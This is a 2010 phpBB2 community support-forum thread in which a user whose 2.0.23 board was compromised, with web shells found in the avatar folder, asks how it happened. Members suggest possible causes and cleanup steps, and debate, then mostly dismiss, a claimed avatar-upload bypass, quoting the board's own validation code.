phpBB2Refugees.com Logo
Not affiliated with or endorsed by the phpBB Group

Register •  Login 

Continue the legacy...

Welcome to all phpBB2 Refugees!Wave Smilie

This site is intended to continue support for the legacy 2.x line of the phpBB2 bulletin board package. If you are a fan of phpBB2, please, by all means register, post, and help us out by offering your suggestions. We are primarily a community and support network. Our secondary goal is to provide a phpBB2 MOD Author and Styles area.

2.0.23 forum hacked, now what?


 
Search this topic... | Search General Support... | Search Box
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Author Message
cif
Board Member



Joined: 13 Jul 2010

Posts: 2



PostPosted: Tue Jul 13, 2010 12:15 pm 
Post subject: 2.0.23 forum hacked, now what?

Hi,

My forum was hacked and it seems that no harm was done to it.

Now my problem is to understand how and why it was hacked and what to do to "close it down".


Of course I will upgrade right now to phpbb 3, but I would like to understand what went wrong.


Does someone know any popular 2.0.23 exploit or something like that? (my password is quite strong and not used anywhere else)
Back to top
Jim_UK
Board Member



Joined: 19 Nov 2008

Posts: 656
Location: North West UK


flag
PostPosted: Tue Jul 13, 2010 2:32 pm 
Post subject: Re: 2.0.23 forum hacked, now what?

As far as I am aware there are no exploits of 2.0.23 but it may be that you have an out of date mod that is allowing access.
You have not said what form the hack took - doing so may well have given an insight into how they did it.
I take it you do not allow html in posts!!!

How strange for a hack to do no harm. Please describe the result of the hack.
Remember that a server can be hacked giving access to all sites on that server. I had one such hack that placed a redirect to a phishing site onto all sites on the server. That hack was via an outdated cpanel and not phpBB2.

More info please.

Also be sure to check your install for any files or folders that have been recently uploaded. Do not just assume that the hack has gone.

Jim
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 628
Location: Spain


flag
PostPosted: Tue Jul 13, 2010 6:27 pm 
Post subject: Re: 2.0.23 forum hacked, now what?

As Jim says,

Please give more details about what happened? icon_wink.gif

_________________
phpBB2 will never die, I hope!
Back to top
cif
Board Member



Joined: 13 Jul 2010

Posts: 2



PostPosted: Wed Jul 14, 2010 10:43 am 
Post subject: Re: 2.0.23 forum hacked, now what?

I don't know many more details.

I know someone took over my admin account and from my investigations there are some php web shells installed in my images/avatar folder.

I allow users to upload avatars. Was there any exploit for phpbb that allowed the user to upload a php file instead of an image file or something like that?
Back to top
Salvatos
Board Member



Joined: 19 Feb 2009

Posts: 449
Location: Québec


flag
PostPosted: Wed Jul 14, 2010 2:58 pm 
Post subject: Re: 2.0.23 forum hacked, now what?

I had a friend of a friend check for possible hacks on my board last year and he said he could upload a PHP file instead of an avatar by tricking the software into thinking it was an image file. He told me that if he uploaded the file from his computer instead of entering a URL, he got this elseif for verification (line 92 of includes/usercp_avatar.php):

Code:
else if ( ( file_exists(@phpbb_realpath($avatar_filename)) ) && preg_match('/\.(jpg|jpeg|gif|png)$/i', $avatar_realname) )


Which doesn't check the Content-Type of the file. If I remember correctly, copying these lines from includes/usercp_avatar.php somewhere into the elseif on line 192 and beyond was all it took to fix. For some reason I didn't actually do it, maybe because I was keeping it for later because of my wrists. From line 155:

Code:
      if (!preg_match('#Content-Length\: ([0-9]+)[^ /][\s]+#i', $avatar_data, $file_data1) || !preg_match('#Content-Type\: image/[x\-]*([a-z]+)[\s]+#i', $avatar_data, $file_data2))
      {
         $error = true;
         $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['File_no_data'] : $lang['File_no_data'];
         return;
      }


If it's in the avatar folder, I guess that's how they may have done it.
Back to top
lumpy burgertushie
Board Member



Joined: 18 Nov 2008

Posts: 266


flag
PostPosted: Thu Jul 15, 2010 12:07 am 
Post subject: Re: 2.0.23 forum hacked, now what?

that seems way to easy to not have been used before and therefore it would have been known about by now.

I doubt that it is a valid vulnerability.

to the original poster:

please provide a link to your board and maybe post the contents of one of those files here in code box for us to look at.


robertt
Back to top
Slackervaara
Board Member



Joined: 01 Jan 2009

Posts: 70



PostPosted: Thu Jul 15, 2010 12:22 am 
Post subject: Re: 2.0.23 forum hacked, now what?

If you know what time you were hacked you could look in the access logs for your site and it can reveal how the site was hacked. However, sometimes the hackers uses keyloggers that are on your own PC and then they can get the log in details for ftp to the site and compromise the site with malware.
Back to top
Acaria
Board Member



Joined: 20 Feb 2009

Posts: 238



PostPosted: Thu Jul 15, 2010 7:30 am 
Post subject: Re: 2.0.23 forum hacked, now what?

I just tested that vulnerability you posted Salvatos and it doesn't work on my vanilla installation. I made a simple echo statement and changed the file extension to .png, but it still checked the filetype. I don't know how it worked for your friend, but it assuredly didn't work for me.
Back to top
Salvatos
Board Member



Joined: 19 Feb 2009

Posts: 449
Location: Québec


flag
PostPosted: Thu Jul 15, 2010 12:33 pm 
Post subject: Re: 2.0.23 forum hacked, now what?

Then I guess he was wrong. Or maybe you can do it if you also change the first bits of the file.
Back to top
lumpy burgertushie
Board Member



Joined: 18 Nov 2008

Posts: 266


flag
PostPosted: Mon Jul 19, 2010 3:32 am 
Post subject: Re: 2.0.23 forum hacked, now what?

I am pretty sure he was simply wrong about it.

there have always been people that say that phpbb has vulnerabilities that prove to be incorrect.

phpbb3 has not been hacked yet and I don't think phpbb 2.0.24 has either.


robert
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 628
Location: Spain


flag
PostPosted: Mon Jul 19, 2010 6:52 am 
Post subject: Re: 2.0.23 forum hacked, now what?

I agree,

If this was due to a vulnerability this would have been done a long time ago, repeatedly, on many other boards, and it would have been fixed.

_________________
phpBB2 will never die, I hope!
Back to top
Sylver Cheetah 53
Board Member



Joined: 17 Dec 2008

Posts: 426
Location: Milky Way


flag
PostPosted: Tue Jul 20, 2010 9:40 pm 
Post subject: Re: 2.0.23 forum hacked, now what?

I know that there are bins programs, that can put another file into a jpg one. icon_wink.gif
_________________
Image link
My Forum || My Blog

phpBB2 forever! icon_smile.gif
Back to top
Display posts from previous:   
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Page 1 of 1 All times are GMT - 4 Hours
 
Jump to:  

Index • About • FAQ • Rules • Privacy • Search •  Register •  Login 
Not affiliated with or endorsed by the phpBB Group
Powered by phpBB2 © phpBB Group
Generated in 0.0524 seconds using 17 queries. (SQL 0.0149 Parse 0.0010 Other 0.0366)
phpBB Customizations by the phpBBDoctor.com
Template Design by DeLFlo and MomentsOfLight.com Moments of Light Logo